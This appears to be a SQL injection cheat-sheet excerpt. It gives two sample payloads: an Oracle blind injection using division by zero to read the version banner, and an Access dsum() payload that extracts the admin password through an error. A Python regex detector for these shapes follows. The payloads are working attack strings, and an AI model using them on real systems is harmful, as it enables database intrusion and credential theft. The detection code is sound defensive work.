SAMPLE
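Key points
Use AND 1 = 1 / 1 or 1 = 1 / 0 to test whether an injection exists: if the expression evaluates correctly the page is returned normally; if not, the 1/0 raises an error (division by zero) and the page reports an error;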
queueID = 743994 AND 1 = 1 / (select case when substr(banner, 1, 1) = 'A' then 1 else 0 end from (select banner from v$version where banner like '%Oracle%'))
reference
https://isc.sans.edu/diary/Exploiting+%28pretty%29+blind+SQL+injections/20733
https://isc.sans.edu/diary/Advanced+blind+SQL+injection+%28with+Oracle+examples%29/6409
SAMPLE
Key points
Via the dsum() and dfirst() functions
/list.asp?id=123-dsum(chr(39)+cstr((select+top+1+password+from+admin)),'admin')
reference
Butian conference - penetration testing techniques PPT
https://627fff.lt.yunpan.cn/lk/cSG5zCGGLtgBs
d7a5
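
A defensive check for the two payload shapes in the samples above, added here as an example and not taken from the referenced material: it scans request parameters for a division whose divisor is zero or a sub-select/CASE, for the Access domain functions dsum()/dfirst(), and for v$version. The rule set, the name scan_request, the /view.jsp, /report and /search paths and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Detection rules written for this example (assumptions, not a vendor rule set).
RULES = {
    # "= 1 / 0" or "= 1 / (select case when ...)": divisor is zero or a sub-select/CASE
    "conditional_division": re.compile(
        r"=\s*\d+\s*/\s*(0(?![\d.])|\(\s*select\b|case\b)", re.I),
    # Access domain aggregate functions called inside a parameter value
    "access_domain_function": re.compile(r"\bd(sum|first)\s*\(", re.I),
    # Oracle version view used by the banner sub-select
    "oracle_version_view": re.compile(r"\bv\$version\b", re.I),
}


def scan_request(target):
    """Return sorted (parameter, rule) pairs that fired for one request target."""
    hits = set()
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl decoded once ('+' and %XX); decode again for double-encoded
        # input, then collapse whitespace so spacing does not hide the pattern.
        text = " ".join(unquote(value).split())
        for rule, pattern in RULES.items():
            if pattern.search(text):
                hits.add((name, rule))
    return sorted(hits)


# Constructed request targets: three carry the payloads shown on this page,
# three are benign look-alikes. Paths other than /list.asp are hypothetical.
SAMPLE_REQUESTS = [
    "/view.jsp?queueID=743994",
    "/view.jsp?queueID=743994%20AND%201%20=%201%20/%200",
    "/view.jsp?queueID=743994+AND+1=1/(select+case+when+substr(banner,1,1)='A'"
    "+then+1+else+0+end+from+(select+banner+from+v$version"
    "+where+banner+like+'%25Oracle%25'))",
    "/list.asp?id=123-dsum(chr(39)+cstr((select+top+1+password+from+admin)),'admin')",
    "/report?ratio=1/2&page=3",
    "/search?q=dsum+tutorial",
]

if __name__ == "__main__":
    for target in SAMPLE_REQUESTS:
        print(scan_request(target) or "clean", "<-", target[:50])
```

Matches from rules like these are triage signals for log review or a WAF; the fix for the underlying flaw remains parameterized queries on the affected pages.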